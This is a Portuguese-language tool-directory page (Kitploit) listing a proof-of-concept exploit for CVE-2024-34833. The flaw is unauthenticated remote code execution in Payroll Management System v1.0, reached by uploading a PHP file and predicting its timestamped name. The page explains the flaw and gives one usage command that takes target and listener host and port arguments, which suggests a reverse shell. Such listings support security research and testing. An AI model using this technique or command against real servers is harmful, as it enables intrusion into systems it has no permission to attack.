Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-34833-payroll-management-system-rce — Exploit de execução remota de código não autenticado para Payroll Management System v1.0 via upload de arquivo PHP malicioso com previsão de nome de arquivo baseada em timestamp. | Kitploit
Ferramentas/GitHubGitHub/shellunease/cve-2024-34833-payroll-management-system-rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubshellunease/cve-2024-34833-payroll-management-system-rce

CVE-2024-34833-payroll-management-system-rce

Exploit de execução remota de código não autenticado para Payroll Management System v1.0 via upload de arquivo PHP malicioso com previsão de nome de arquivo baseada em timestamp.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 2 anosAinda não revisado

CVE-2024-34833 Payroll Management System RCE (Não Autenticado) PoC

RCE via upload de arquivo para https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html. Os nomes dos arquivos têm um timestamp adicionado com precisão de minuto. O script tenta adivinhar o nome do arquivo usando o timestamp do minuto atual, anterior e posterior.

Descrição da vulnerabilidade

O Payroll Management System v1.0 permite que usuários façam upload de imagens através da página "save_settings". Um atacante não autenticado pode usar essa funcionalidade para enviar um arquivo PHP malicioso. Os arquivos enviados são armazenados em uma pasta acessível publicamente e têm um timestamp com precisão de minuto acrescentado aos seus nomes, que pode ser facilmente calculado. A exploração bem-sucedida dessa vulnerabilidade resulta na capacidade de executar código arbitrário como o usuário que executa o servidor web.

Exemplo de uso

root@kitploit:~
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https

Vídeo de exemplo

Baixar ferramenta